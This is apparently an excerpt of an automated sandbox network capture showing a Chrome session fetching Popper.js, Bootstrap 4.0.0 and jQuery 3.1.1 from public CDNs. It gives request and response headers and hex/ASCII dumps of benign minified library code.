                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d
                                                                                                                                                    Data Ascii: c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74
                                                                                                                                                    Data Ascii: t,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b
                                                                                                                                                    Data Ascii: onsole.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c
                                                                                                                                                    Data Ascii: (),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65
                                                                                                                                                    Data Ascii: e;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e
                                                                                                                                                    Data Ascii: ){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}fun
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65
                                                                                                                                                    Data Ascii: ){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=argume


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.2.449753104.18.11.2074433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                    Host: maxcdn.bootstrapcdn.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC966INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    CDN-PullZone: 252412
                                                                                                                                                    CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                    CDN-RequestCountryCode: US
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cache-Control: public, max-age=31919000
                                                                                                                                                    ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                                    Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                    CDN-ProxyVer: 1.06
                                                                                                                                                    CDN-RequestPullSuccess: True
                                                                                                                                                    CDN-RequestPullCode: 200
                                                                                                                                                    CDN-CachedAt: 12/04/2024 01:55:10
                                                                                                                                                    CDN-EdgeStorageId: 1067
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    CDN-Status: 200
                                                                                                                                                    CDN-RequestTime: 0
                                                                                                                                                    CDN-RequestId: 55ff1487c6071501927da70bb950f7b5
                                                                                                                                                    CDN-Cache: HIT
                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                    Age: 938564
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf47ffe3e7d06-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    2025-01-08 08:53:04 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                    Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                                                                                    Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
                                                                                                                                                    Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                                                                                                    Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                                                                                                    Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                                                                                                    Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                                                                                                    Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                                                                                                    Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                                                                                                    Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                                                                                                    2025-01-08 08:53:04 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                                                                                                    Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    10192.168.2.449754151.101.2.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC358OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
